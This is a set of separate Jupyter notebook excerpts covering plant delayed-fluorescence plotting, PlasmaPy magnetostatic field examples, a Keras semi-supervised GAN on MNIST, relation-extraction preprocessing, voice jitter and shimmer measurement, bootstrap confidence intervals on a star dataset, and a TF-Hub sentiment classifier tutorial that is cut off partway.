legend=False ) for i, label in enumerate(['WT', 'VIRc', 'vir-1']): ax.plot([], [], color=pal[i], label=label) ax.legend(loc=1, ncol=3) xticks = [0, 24, 48, 72, 94, 120, 144] ax.set_xticks(xticks) ax.set_xlim(0, 144) ax.set_xlabel('Time (hours)') ax.set_ylabel('Delayed\nFluorescence') plt.tight_layout() plt.savefig('vir1_VIRc_delayed_fluorescence_expt1.svg') plt.show() exp2 = pd.read_excel( './methylation_Summary_file.xlsx', sheet_name='line graphs_20.03.15', header=1, usecols='B:DK,DM', names=([f'WT_{i}' for i in range(61)] + [f'VIRc_{i}' for i in range(29)] + [f'vir-1_{i}' for i in range(24)] + ['hours']), ).set_index('hours') 
exp2.head() mean_df2 = pd.melt( exp2.reset_index(), id_vars=['hours'], var_name='replicate', value_name='delayed_fluorescence' ) mean_df2['condition'] = mean_df2.replicate.str.split('_', expand=True)[0] fig, ax = plt.subplots(figsize=(10, 5)) sns.lineplot( x='hours', y='delayed_fluorescence', hue='condition', hue_order=['WT', 'VIRc', 'vir-1'], data=mean_df2, ax=ax, legend=False ) for i, label in enumerate(['WT', 'VIRc', 'vir-1']): ax.plot([], [], color=pal[i], label=label) ax.legend(loc=1, ncol=3) xticks = [0, 24, 48, 72, 94, 120, 144] ax.set_xticks(xticks) ax.set_xlim(0, 144) ax.set_xlabel('Time (hours)') ax.set_ylabel('Delayed\nFluorescence') plt.tight_layout() plt.savefig('vir1_VIRc_delayed_fluorescence_expt2.svg') plt.show() exp1_period = pd.read_excel( './methylation_Summary_file.xlsx', sheet_name='RAE_plots_01.04.15', skiprows=2, header=None, usecols=[1, 2, 3], names=['condition', 'period', 'gof'] ) exp1_period['condition'] = exp1_period.condition.str.split(':', expand=True)[0].map( {'VIR': 'VIRc', 'vir1': 'vir-1', 'Wild Type': 'WT'}) exp1_period.head() fig, ax = plt.subplots(figsize=(5.5, 5)) sns.boxplot( x='condition', y='period', color='#eeeeee', data=exp1_period, fliersize=0, order=['WT', 'VIRc', 'vir-1'], ax=ax ) sns.stripplot( x='condition', y='period', data=exp1_period, order=['WT', 'VIRc', 'vir-1'], ax=ax, ) ax.set_ylabel('Period Length (hours)') ax.set_xlabel('') ax.set_ylim(22, 28) plt.tight_layout() plt.savefig('vir1_VIRc_period_length_expt1.svg') plt.show() exp2_period = pd.read_excel( './methylation_Summary_file.xlsx', sheet_name='RAE_plots_20.03.15', skiprows=2, header=None, usecols=[1, 2, 3], names=['condition', 'period', 'gof'] ) exp2_period['condition'] = exp2_period.condition.str.split(':', expand=True)[0].map( {'VIR': 'VIRc', 'vir1': 'vir-1', 'Wild Type': 'WT'}) exp2_period.head() fig, ax = plt.subplots(figsize=(5.5, 5)) sns.boxplot( x='condition', y='period', color='#eeeeee', data=exp2_period, fliersize=0, order=['WT', 'VIRc', 'vir-1'], 
ax=ax ) sns.stripplot( x='condition', y='period', data=exp2_period, order=['WT', 'VIRc', 'vir-1'], ax=ax, ) ax.set_ylabel('Period Length (hours)') ax.set_xlabel('') ax.set_ylim(22, 28) plt.tight_layout() plt.savefig('vir1_VIRc_period_length_expt2.svg') plt.show() with pd.ExcelWriter('delayed_fluorescence_results.xlsx') as xlwrtr: exp1.to_excel(xlwrtr, sheet_name='experiment_1') exp2.to_excel(xlwrtr, sheet_name='experiment_2') exp1_period.to_excel(xlwrtr, sheet_name='experiment_1_period_length') exp2_period.to_excel(xlwrtr, sheet_name='experiment_2_period_length') ```
github_jupyter
``` %matplotlib inline ``` Magnetostatic Fields ===================== An example of using PlasmaPy's `Magnetostatic` class in `physics` subpackage. ``` from plasmapy.formulary import magnetostatics from plasmapy.plasma.sources import Plasma3D import numpy as np import astropy.units as u import matplotlib.pyplot as plt ``` Some common magnetostatic fields can be generated and added to a plasma object. A dipole ``` dipole = magnetostatics.MagneticDipole(np.array([0, 0, 1])*u.A*u.m*u.m, np.array([0, 0, 0])*u.m) print(dipole) ``` initialize a a plasma, where the magnetic field will be calculated on ``` plasma = Plasma3D(domain_x=np.linspace(-2, 2, 30) * u.m, domain_y=np.linspace(0, 0, 1) * u.m, domain_z=np.linspace(-2, 2, 20) * u.m) ``` add the dipole field to it ``` plasma.add_magnetostatic(dipole) X, Z = plasma.grid[0, :, 0, :], plasma.grid[2, :, 0, :] U = plasma.magnetic_field[0, :, 0, :].value.T # because grid uses 'ij' indexing W = plasma.magnetic_field[2, :, 0, :].value.T # because grid uses 'ij' indexing plt.figure() plt.axis('square') plt.xlim(-2, 2) plt.ylim(-2, 2) plt.title('Dipole field in x-z plane, generated by a dipole pointing in the z direction') plt.streamplot(plasma.x.value, plasma.z.value, U, W) ``` ``` cw = magnetostatics.CircularWire(np.array([0, 0, 1]), np.array([0, 0, 0])*u.m, 1*u.m, 1*u.A) print(cw) ``` initialize a a plasma, where the magnetic field will be calculated on ``` plasma = Plasma3D(domain_x=np.linspace(-2, 2, 30) * u.m, domain_y=np.linspace(0, 0, 1) * u.m, domain_z=np.linspace(-2, 2, 20) * u.m) ``` add the circular coil field to it ``` plasma.add_magnetostatic(cw) X, Z = plasma.grid[0, :, 0, :], plasma.grid[2, :, 0, :] U = plasma.magnetic_field[0, :, 0, :].value.T # because grid uses 'ij' indexing W = plasma.magnetic_field[2, :, 0, :].value.T # because grid uses 'ij' indexing plt.figure() plt.axis('square') plt.xlim(-2, 2) plt.ylim(-2, 2) plt.title('Circular coil field in x-z plane, generated by a circular coil in the x-y plane') 
plt.streamplot(plasma.x.value, plasma.z.value, U, W) ``` ``` gw_cw = cw.to_GeneralWire() # the calculated magnetic field is close print(gw_cw.magnetic_field([0, 0, 0]) - cw.magnetic_field([0, 0, 0])) ``` ``` iw = magnetostatics.InfiniteStraightWire(np.array([0, 1, 0]), np.array([0, 0, 0])*u.m, 1*u.A) print(iw) ``` initialize a a plasma, where the magnetic field will be calculated on ``` plasma = Plasma3D(domain_x=np.linspace(-2, 2, 30) * u.m, domain_y=np.linspace(0, 0, 1) * u.m, domain_z=np.linspace(-2, 2, 20) * u.m) # add the infinite straight wire field to it plasma.add_magnetostatic(iw) X, Z = plasma.grid[0, :, 0, :], plasma.grid[2, :, 0, :] U = plasma.magnetic_field[0, :, 0, :].value.T # because grid uses 'ij' indexing W = plasma.magnetic_field[2, :, 0, :].value.T # because grid uses 'ij' indexing plt.figure() plt.title('Dipole field in x-z plane, generated by a infinite straight wire ' 'pointing in the y direction') plt.axis('square') plt.xlim(-2, 2) plt.ylim(-2, 2) plt.streamplot(plasma.x.value, plasma.z.value, U, W) ```
github_jupyter
``` from keras.datasets import mnist from keras.layers import Input, Dense, Reshape, Flatten, Dropout, multiply, GaussianNoise from keras.layers import BatchNormalization, Activation, Embedding, ZeroPadding2D from keras.layers.advanced_activations import LeakyReLU from keras.layers.convolutional import UpSampling2D, Conv2D from keras.models import Sequential, Model from keras.optimizers import Adam from keras import losses from keras.utils import to_categorical import keras.backend as K from keras.utils import plot_model from keras.losses import categorical_crossentropy, mean_squared_error import matplotlib.pyplot as plt % matplotlib inline import numpy as np ``` ## hyper parameter ``` img_rows = 28 img_cols = 28 channels = 1 img_shape = (img_rows, img_cols, channels) num_labeled_images = 100 features_dim = 4096 num_classes = 10 noise_dim = 100 latent_dim = noise_dim batch_size=100 steps_per_epoch = (60000 - num_labeled_images) // batch_size epochs = 100 optimizer = Adam(0.001, 0.5) ``` ## build generator ``` # inputs input_noise = Input(shape=(latent_dim,)) # hidden layer g = Dense(128 * 7 * 7, activation="relu", input_dim=latent_dim)(input_noise) g = Reshape((7, 7, 128))(g) g = BatchNormalization(momentum=0.8)(g) g = UpSampling2D()(g) g = Conv2D(128, kernel_size=3, padding="same")(g) g = Activation("relu")(g) g = BatchNormalization(momentum=0.8)(g) g = UpSampling2D()(g) g = Conv2D(64, kernel_size=3, padding="same")(g) g = Activation("relu")(g) g = BatchNormalization(momentum=0.8)(g) g = Conv2D(1, kernel_size=3, padding="same")(g) # outputs g_image = Activation("tanh")(g) generator = Model(input_noise, g_image) ``` ## build discriminator ``` # inputs input_image = Input(shape=img_shape) d = Conv2D(32, kernel_size=3, strides=2, input_shape=img_shape, padding="same")(input_image) d = LeakyReLU(alpha=0.2)(d) d = Dropout(0.25)(d) d = Conv2D(64, kernel_size=3, strides=2, padding="same")(d) d = ZeroPadding2D(padding=((0,1),(0,1)))(d) d = LeakyReLU(alpha=0.2)(d) d = 
Dropout(0.25)(d) d = BatchNormalization(momentum=0.8)(d) d = Conv2D(128, kernel_size=3, strides=2, padding="same")(d) d = LeakyReLU(alpha=0.2)(d) d = Dropout(0.25)(d) d = BatchNormalization(momentum=0.8)(d) d = Conv2D(256, kernel_size=3, strides=1, padding="same")(d) d = LeakyReLU(alpha=0.2)(d) d = Dropout(0.25)(d) features = Flatten(name='features_output')(d) label = Dense(num_classes, name='y_output')(features) # there is no activation here discriminator = Model(input_image, [features, label]) ``` ## Combined model ``` discriminator.trainable = False validity = discriminator(g_image) combined = Model(input_noise, validity) ``` ## Loss function ``` ############## # Loss functions # ############## def softmax_cross_entropy(y_true, y_output): y_pred = K.softmax(y_output) loss =categorical_crossentropy(y_true, y_pred) return loss def discriminate_real(y_output, batch_size=batch_size): # logD(x) = logZ(x) - log(Z(x) + 1) where Z(x) = sum_{k=1}^K exp(l_k(x)) log_zx = K.logsumexp(y_output, axis=1) log_dx = log_zx - K.softplus(log_zx) dx = K.sum(K.exp(log_dx)) / batch_size loss = -K.sum(log_dx) / batch_size return loss, dx def discriminate_fake(y_output, batch_size=batch_size): # log{1 - D(x)} = log1 - log(Z(x) + 1) log_zx_g = K.logsumexp(y_output, axis=1) loss = K.sum(K.softplus(log_zx_g)) / batch_size return loss ################# # Discriminator Loss # ################# def labeled_loss(y_true, y_output): class_loss = softmax_cross_entropy(y_true, y_output) _,dx = discriminate_real(y_output, batch_size=batch_size) return class_loss def unlabeled_loss(g_label, y_output, batch_size=batch_size): loss_real,dx = discriminate_real(y_output, batch_size=batch_size) loss_fake = discriminate_fake(g_label, batch_size=batch_size) return loss_real + loss_fake ############### # Generator Loss # ############### def feature_matching(features_true, features_fake): return mean_squared_error(features_true, features_fake) def generator_loss(_, y_output): loss_real,dx = 
discriminate_real(y_output, batch_size=batch_size) return loss_real plot_model(discriminator, to_file='discriminator_model.png', show_shapes=True) plot_model(combined, to_file='combined_model.png', show_shapes=True) from keras.preprocessing.image import load_img # load_img('discriminator_model.png') # load_img('combined_model.png') ``` ## Prepare datasets ``` # Load the dataset (x_train, y_train), (x_test, y_test) = mnist.load_data() num_samples = 10 x_labeled = [] y_labeled = [] x_unlabeled = [] for class_index in range(10): label_index = np.where(y_train == class_index) class_input_data = x_train[label_index] # labeled data x_labeled.append(class_input_data[:num_samples]) y_labeled.append(np.full(num_samples, class_index, int)) # unlabeled data x_unlabeled.append(class_input_data[num_samples:]) x_labeled = np.concatenate(x_labeled, axis=0) x_unlabeled = np.concatenate(x_unlabeled, axis=0) x_labeled = x_labeled.astype('float32') / 255 x_unlabeled = x_unlabeled.astype('float32') / 255 x_labeled = x_labeled.reshape(x_labeled.shape+(1,)) x_unlabeled = x_unlabeled.reshape(x_unlabeled.shape+(1,)) y_labeled = np.concatenate(y_labeled, axis=0) y_labeled_onehot = np.eye(num_classes)[y_labeled] # test data x_test = x_test.astype('float32') / 255 x_test = x_test.reshape(x_test.shape+(1,)) y_test = np.eye(num_classes)[y_test] print('labeled input_shape: {}, {}\nunlabeled input_shape: {}'.format(x_labeled.shape, y_labeled_onehot.shape, x_unlabeled.shape)) print('test input_shape: ', x_test.shape, y_test.shape) # 教師なしの枚数が、教師ありと一致するようにリピート labeled_index = [] for i in range(len(x_unlabeled) // len(x_labeled)): l = np.arange(len(x_labeled)) np.random.shuffle(l) labeled_index.append(l) labeled_index = np.concatenate(labeled_index) unlabeled_index = np.arange(len(x_unlabeled)) print(labeled_index.shape, unlabeled_index.shape) dummy_features = np.zeros((batch_size, features_dim)) dummy_label = np.zeros((batch_size, num_classes)) history = [] for epoch in range(epochs): print('epoch 
{}/{}'.format(epoch+1, epochs)) np.random.shuffle(unlabeled_index) np.random.shuffle(labeled_index) for step in range(steps_per_epoch): print('step {}/{}'.format(step+1, steps_per_epoch)) unlabel_index_range = unlabeled_index[step*batch_size:(step+1)*batch_size] label_index_range = labeled_index[step*batch_size:(step+1)*batch_size] images_l = x_labeled[label_index_range] label_l = y_labeled_onehot[label_index_range] images_u = x_unlabeled[unlabel_index_range] # --------------------- # Train Discriminator # --------------------- ######### # for label ######### discriminator.compile( optimizer=optimizer, loss= labeled_loss, loss_weights={'features_output': 0., 'y_output': 1.}, metrics = {'y_output': 'accuracy'}) # Train the discriminator d_loss_label = discriminator.train_on_batch(images_l, [dummy_features, label_l]) print('label_loss: {}, label_acc: {}'.format(d_loss_label[0], d_loss_label[3])) ############ # for unlabeled ############ discriminator.compile( optimizer=optimizer, loss= unlabeled_loss, loss_weights={'features_output': 0., 'y_output': 1.}) z_batch = np.random.normal(0, 1, (batch_size, noise_dim)).astype(np.float32) _, g_label = combined.predict(z_batch) # Train the discriminator d_loss_unlabel = discriminator.train_on_batch(images_u, [dummy_features, g_label]) print('unlabel_loss : ', d_loss_unlabel[0]) # --------------------- # Train Generator # --------------------- combined.compile( optimizer=optimizer, loss= [feature_matching, generator_loss], loss_weights=[1, 1]) # Train the generator z_batch = np.random.normal(0, 1, (batch_size, noise_dim)).astype(np.float32) features_true, _ = discriminator.predict(images_l) g_loss = combined.train_on_batch(z_batch, [features_true, dummy_label]) # Plot the progress print ('g_loss', g_loss) # validation discriminator.compile( optimizer=optimizer, loss= labeled_loss, loss_weights={'features_output': 0., 'y_output': 1.}, metrics = {'y_output': 'accuracy'}) test_eval = discriminator.evaluate(x_test, 
[np.zeros((10000, features_dim)), y_test]) print('val_acc: ', test_eval[3]) history.append(test_eval) ```
github_jupyter
# Pre-processing: entity/concept blinding, punctuation removal, digit normalization, stop-word removal, and NER blinding
``` %load_ext autoreload %autoreload import os, pandas as pd, numpy as np import sys sys.path.append('../../../') from relation_extraction.data import utils import nltk from ast import literal_eval import itertools import spacy RESOURCE_PATH = "/data/medg/misc/geeticka/relation_extraction/semeval2010" indir = 'pre-processed/original/' outdir1 = 'pre-processed/entity_blinding/' outdir2 = 'pre-processed/punct_stop_digit/' outdir3 = 'pre-processed/punct_digit/' outdir4 = 'pre-processed/ner_blinding/' def res(path): return os.path.join(RESOURCE_PATH, path) from relation_extraction.data.converters.converter_semeval2010 import write_dataframe, read_dataframe,\ check_equality_of_written_and_read_df, write_into_txt # from relation_extraction.data.preprocess import replace_with_concept, replace_digit_punctuation_stop_word,\ # get_entity_positions_and_replacement_sentence from relation_extraction.data.preprocess import preprocess, replace_ner, get_entity_positions_and_replacement_sentence def makedir(outdir, res): if not os.path.exists(res(outdir)): os.makedirs(res(outdir)) # nlp = spacy.load('en_core_web_lg') ``` A good row to look at in drugbank data is 4123 df_train_drugbank.iloc[4123] ## Write the different preprocessed versions into csv files ``` # original_dataframe_names = ['train', 'test'] # makedir(outdir1, res) # makedir(outdir2, res) # makedir(outdir3, res) # makedir(outdir4, res) # for original_df_name in original_dataframe_names: # type1 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv')) # type2 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv'), 2) # type3 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv'), 3) # type4 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv'), nlp, 4) # write_dataframe(type1, res(outdir1 + original_df_name + '_entity_blinding.csv')) # write_dataframe(type2, res(outdir2 + original_df_name + '_punct_stop_digit.csv')) # 
write_dataframe(type3, res(outdir3 + original_df_name + '_punct_digit.csv')) # write_dataframe(type4, res(outdir4 + original_df_name + '_ner_blinding.csv')) ``` ## Write into text format ``` # for original_df_name in original_dataframe_names: # type1 = read_dataframe(res(outdir1 + original_df_name + '_entity_blinding.csv')) # type2 = read_dataframe(res(outdir2 + original_df_name + '_punct_stop_digit.csv')) # type3 = read_dataframe(res(outdir3 + original_df_name + '_punct_digit.csv')) # type4 = read_dataframe(res(outdir4 + original_df_name + '_ner_blinding.csv')) # write_into_txt(type1, res(outdir1 + original_df_name + '_entity_blinding.txt')) # write_into_txt(type2, res(outdir2 + original_df_name + '_punct_stop_digit.txt')) # write_into_txt(type3, res(outdir3 + original_df_name + '_punct_digit.txt')) # write_into_txt(type4, res(outdir4 + original_df_name + '_ner_blinding.txt')) ``` ## Check that the lengths of the files created is correct ``` def output_file_length(res, filename): return len(open(res(filename)).readlines()) print(output_file_length(res, indir + 'train_original.txt')) print(output_file_length(res, outdir1 + 'train_entity_blinding.txt')) print(output_file_length(res, outdir2 + 'train_punct_stop_digit.txt')) print(output_file_length(res, outdir3 + 'train_punct_digit.txt')) print(output_file_length(res, outdir4 + 'train_ner_blinding.txt')) print(output_file_length(res, indir + 'test_original.txt')) print(output_file_length(res, outdir1 + 'test_entity_blinding.txt')) print(output_file_length(res, outdir2 + 'test_punct_stop_digit.txt')) print(output_file_length(res, outdir3 + 'test_punct_digit.txt')) print(output_file_length(res, outdir4 + 'test_ner_blinding.txt')) ```
github_jupyter
``` #Measure pitch of all wav files in directory import glob import numpy as np import pandas as pd import parselmouth from parselmouth.praat import call from sklearn.decomposition import PCA from sklearn.preprocessing import StandardScaler # This is the function to measure voice pitch def measurePitch(voiceID, f0min, f0max, unit): sound = parselmouth.Sound(voiceID) # read the sound pitch = call(sound, "To Pitch", 0.0, f0min, f0max) #create a praat pitch object meanF0 = call(pitch, "Get mean", 0, 0, unit) # get mean pitch stdevF0 = call(pitch, "Get standard deviation", 0 ,0, unit) # get standard deviation harmonicity = call(sound, "To Harmonicity (cc)", 0.01, 75, 0.1, 1.0) hnr = call(harmonicity, "Get mean", 0, 0) pointProcess = call(sound, "To PointProcess (periodic, cc)", f0min, f0max) localJitter = call(pointProcess, "Get jitter (local)", 0, 0, 0.0001, 0.02, 1.3) localabsoluteJitter = call(pointProcess, "Get jitter (local, absolute)", 0, 0, 0.0001, 0.02, 1.3) rapJitter = call(pointProcess, "Get jitter (rap)", 0, 0, 0.0001, 0.02, 1.3) ppq5Jitter = call(pointProcess, "Get jitter (ppq5)", 0, 0, 0.0001, 0.02, 1.3) ddpJitter = call(pointProcess, "Get jitter (ddp)", 0, 0, 0.0001, 0.02, 1.3) localShimmer = call([sound, pointProcess], "Get shimmer (local)", 0, 0, 0.0001, 0.02, 1.3, 1.6) localdbShimmer = call([sound, pointProcess], "Get shimmer (local_dB)", 0, 0, 0.0001, 0.02, 1.3, 1.6) apq3Shimmer = call([sound, pointProcess], "Get shimmer (apq3)", 0, 0, 0.0001, 0.02, 1.3, 1.6) aqpq5Shimmer = call([sound, pointProcess], "Get shimmer (apq5)", 0, 0, 0.0001, 0.02, 1.3, 1.6) apq11Shimmer = call([sound, pointProcess], "Get shimmer (apq11)", 0, 0, 0.0001, 0.02, 1.3, 1.6) ddaShimmer = call([sound, pointProcess], "Get shimmer (dda)", 0, 0, 0.0001, 0.02, 1.3, 1.6) return meanF0, stdevF0, hnr, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer def runPCA(df): #Z-score the Jitter and 
Shimmer measurements features = ['localJitter', 'localabsoluteJitter', 'rapJitter', 'ppq5Jitter', 'ddpJitter', 'localShimmer', 'localdbShimmer', 'apq3Shimmer', 'apq5Shimmer', 'apq11Shimmer', 'ddaShimmer'] # Separating out the features x = df.loc[:, features].values # Separating out the target #y = df.loc[:,['target']].values # Standardizing the features x = StandardScaler().fit_transform(x) #PCA pca = PCA(n_components=2) principalComponents = pca.fit_transform(x) principalDf = pd.DataFrame(data = principalComponents, columns = ['JitterPCA', 'ShimmerPCA']) principalDf return principalDf # create lists to put the results file_list = [] mean_F0_list = [] sd_F0_list = [] hnr_list = [] localJitter_list = [] localabsoluteJitter_list = [] rapJitter_list = [] ppq5Jitter_list = [] ddpJitter_list = [] localShimmer_list = [] localdbShimmer_list = [] apq3Shimmer_list = [] aqpq5Shimmer_list = [] apq11Shimmer_list = [] ddaShimmer_list = [] # Go through all the wave files in the folder and measure pitch for wave_file in glob.glob("audio/*.wav"): sound = parselmouth.Sound(wave_file) (meanF0, stdevF0, hnr, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer) = measurePitch(sound, 75, 500, "Hertz") file_list.append(wave_file) # make an ID list mean_F0_list.append(meanF0) # make a mean F0 list sd_F0_list.append(stdevF0) # make a sd F0 list hnr_list.append(hnr) localJitter_list.append(localJitter) localabsoluteJitter_list.append(localabsoluteJitter) rapJitter_list.append(rapJitter) ppq5Jitter_list.append(ppq5Jitter) ddpJitter_list.append(ddpJitter) localShimmer_list.append(localShimmer) localdbShimmer_list.append(localdbShimmer) apq3Shimmer_list.append(apq3Shimmer) aqpq5Shimmer_list.append(aqpq5Shimmer) apq11Shimmer_list.append(apq11Shimmer) ddaShimmer_list.append(ddaShimmer) df = pd.DataFrame(np.column_stack([file_list, mean_F0_list, sd_F0_list, hnr_list, localJitter_list, 
localabsoluteJitter_list, rapJitter_list, ppq5Jitter_list, ddpJitter_list, localShimmer_list, localdbShimmer_list, apq3Shimmer_list, aqpq5Shimmer_list, apq11Shimmer_list, ddaShimmer_list]), columns=['voiceID', 'meanF0Hz', 'stdevF0Hz', 'HNR', 'localJitter', 'localabsoluteJitter', 'rapJitter', 'ppq5Jitter', 'ddpJitter', 'localShimmer', 'localdbShimmer', 'apq3Shimmer', 'apq5Shimmer', 'apq11Shimmer', 'ddaShimmer']) #add these lists to pandas in the right order pcaData = runPCA(df) df = pd.concat([df, pcaData], axis=1) # Write out the updated dataframe df.to_csv("processed_results.csv", index=False) df ```
github_jupyter
# Home Work Assignment 3: Bootstrap ``` import numpy as np import pandas as pd df = pd.read_csv('star_dataset.csv') df.head() ``` Best partition from previous work is determined by the following parameters. ``` n_cluster = 4 random_state = 9 from sklearn.cluster import KMeans from sklearn.preprocessing import StandardScaler quantitative_columns = ['Temperature (K)', 'Luminosity(L/Lo)', 'Radius(R/Ro)', 'Absolute magnitude(Mv)'] X = df[quantitative_columns] X = StandardScaler().fit_transform(X) kmeans = KMeans(n_clusters=n_cluster, n_init=1, max_iter=500, init='random', tol=1e-4, algorithm='full', random_state=random_state) kmeans.fit(X) df['cluster_id'] = kmeans.labels_ df.head(10) ``` ### 1. Take a feature, find the 95% confidence interval for its grand mean by using bootstrap ``` def bootstrap(data, K): data = np.asarray(data) N = len(data) means = [] for _ in range(K): idxs = np.random.choice(N, N, replace=True) mean = data[idxs].mean() means.append(mean) return np.asarray(means) def confidence_interval(means, pivotal=True): if pivotal is True: left = means.mean() - 1.96 * means.std() right = means.mean() + 1.96 * means.std() else: left = np.percentile(means, 2.5) right = np.percentile(means, 97.5) return sorted([abs(left), abs(right)]) print('mean: {:.2f}'.format(df['Temperature (K)'].mean())) print('no-pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(bootstrap(df['Temperature (K)'], 1000), pivotal=False))) print('pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(bootstrap(df['Temperature (K)'], 1000), pivotal=True))) ``` ### 2. 
Compare the within-cluster means for one of the features between two clusters using bootstrap ``` cluster_0 = df[df['cluster_id'] == 0] cluster_1 = df[df['cluster_id'] == 1] data = bootstrap(cluster_0['Temperature (K)'], 1000) - bootstrap(cluster_1['Temperature (K)'], 1000) print('no-pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=False))) print('pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=True))) ``` ### 3. Take a cluster, and compare the grand mean with the within- cluster mean for the feature by using bootstrap ``` cluster_0 = df cluster_1 = df[df['cluster_id'] == 1] data = bootstrap(cluster_0['Temperature (K)'], 1000) - bootstrap(cluster_1['Temperature (K)'], 1000) print('no-pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=False))) print('pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=True))) ```
github_jupyter
##### Copyright 2018 The TensorFlow Hub Authors. Licensed under the Apache License, Version 2.0 (the "License"); ``` # Copyright 2018 The TensorFlow Hub Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== ``` # How to build a simple text classifier with TF-Hub > Note: This tutorial uses **deprecated** TensorFlow 1 functionality. For a modern approach to this task, see the [TensorFlow 2 version](https://www.tensorflow.org/hub/tutorials/tf2_text_classification). <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/hub/blob/master/docs/tutorials/text_classification_with_tf_hub.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/hub/blob/master/docs/tutorials/text_classification_with_tf_hub.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a> </td> <td> <a href="https://tfhub.dev/google/nnlm-en-dim128/1"><img src="https://www.tensorflow.org/images/hub_logo_32px.png" />See TF Hub model</a> </td> </table> TF-Hub is a platform to share machine learning expertise packaged in reusable resources, notably pre-trained **modules**. This tutorial is organized into two main parts. 
**Introduction:** Training a text classifier with TF-Hub We will use a TF-Hub text embedding module to train a simple sentiment classifier with a reasonable baseline accuracy. We will then analyze the predictions to make sure our model is reasonable and propose improvements to increase the accuracy. **Advanced:** Transfer learning analysis In this section, we will use various TF-Hub modules to compare their effect on the accuracy of the estimator and demonstrate advantages and pitfalls of transfer learning. ## Optional prerequisites * Basic understanding of Tensorflow [premade estimator framework](https://www.tensorflow.org/tutorials/estimator/premade). * Familiarity with [Pandas](https://pandas.pydata.org/) library. ## Setup ``` # Install TF-Hub. !pip install seaborn ``` More detailed information about installing Tensorflow can be found at [https://www.tensorflow.org/install/](https://www.tensorflow.org/install/). ``` from absl import logging import tensorflow as tf import tensorflow_hub as hub import matplotlib.pyplot as plt import numpy as np import os import pandas as pd import re import seaborn as sns ``` # Getting started ## Data We will try to solve the [Large Movie Review Dataset v1.0](http://ai.stanford.edu/~amaas/data/sentiment/) task [(Mass et al., 2011)](http://ai.stanford.edu/~amaas/papers/wvSent_acl2011.pdf). The dataset consists of IMDB movie reviews labeled by positivity from 1 to 10. The task is to label the reviews as **negative** or **positive**. ``` # Load all files from a directory in a DataFrame. def load_directory_data(directory): data = {} data["sentence"] = [] data["sentiment"] = [] for file_path in os.listdir(directory): with tf.io.gfile.GFile(os.path.join(directory, file_path), "r") as f: data["sentence"].append(f.read()) data["sentiment"].append(re.match("\d+_(\d+)\.txt", file_path).group(1)) return pd.DataFrame.from_dict(data) # Merge positive and negative examples, add a polarity column and shuffle. 
def load_dataset(directory): pos_df = load_directory_data(os.path.join(directory, "pos")) neg_df = load_directory_data(os.path.join(directory, "neg")) pos_df["polarity"] = 1 neg_df["polarity"] = 0 return pd.concat([pos_df, neg_df]).sample(frac=1).reset_index(drop=True) # Download and process the dataset files. def download_and_load_datasets(force_download=False): dataset = tf.keras.utils.get_file( fname="aclImdb.tar.gz", origin="http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz", extract=True) train_df = load_dataset(os.path.join(os.path.dirname(dataset), "aclImdb", "train")) test_df = load_dataset(os.path.join(os.path.dirname(dataset), "aclImdb", "test")) return train_df, test_df # Reduce logging output. logging.set_verbosity(logging.ERROR) train_df, test_df = download_and_load_datasets() train_df.head() ``` ## Model ### Input functions [Estimator framework](https://www.tensorflow.org/tutorials/estimator/premade) provides [input functions](https://www.tensorflow.org/api_docs/python/tf/compat/v1/estimator/inputs/pandas_input_fn) that wrap Pandas dataframes. ``` # Training input on the whole training set with no limit on training epochs. train_input_fn = tf.compat.v1.estimator.inputs.pandas_input_fn( train_df, train_df["polarity"], num_epochs=None, shuffle=True) # Prediction on the whole training set. predict_train_input_fn = tf.compat.v1.estimator.inputs.pandas_input_fn( train_df, train_df["polarity"], shuffle=False) # Prediction on the test set. predict_test_input_fn = tf.compat.v1.estimator.inputs.pandas_input_fn( test_df, test_df["polarity"], shuffle=False) ``` ### Feature columns TF-Hub provides a [feature column](https://www.tensorflow.org/hub/api_docs/python/hub/text_embedding_column.md) that applies a module on the given text feature and passes further the outputs of the module. In this tutorial we will be using the [nnlm-en-dim128 module](https://tfhub.dev/google/nnlm-en-dim128/1). 
For the purpose of this tutorial, the most important facts are: * The module takes **a batch of sentences in a 1-D tensor of strings** as input. * The module is responsible for **preprocessing of sentences** (e.g. removal of punctuation and splitting on spaces). * The module works with any input (e.g. **nnlm-en-dim128** hashes words not present in vocabulary into ~20.000 buckets). ``` embedded_text_feature_column = hub.text_embedding_column( key="sentence", module_spec="https://tfhub.dev/google/nnlm-en-dim128/1") ``` ### Estimator For classification we can use a [DNN Classifier](https://www.tensorflow.org/api_docs/python/tf/estimator/DNNClassifier) (note further remarks about different modelling of the label function at the end of the tutorial). ``` estimator = tf.estimator.DNNClassifier( hidden_units=[500, 100], feature_columns=[embedded_text_feature_column], n_classes=2, optimizer=tf.keras.optimizers.Adagrad(lr=0.003)) ``` ### Training Train the estimator for a reasonable amount of steps. ``` # Training for 5,000 steps means 640,000 training examples with the default # batch size. This is roughly equivalent to 25 epochs since the training dataset # contains 25,000 examples. 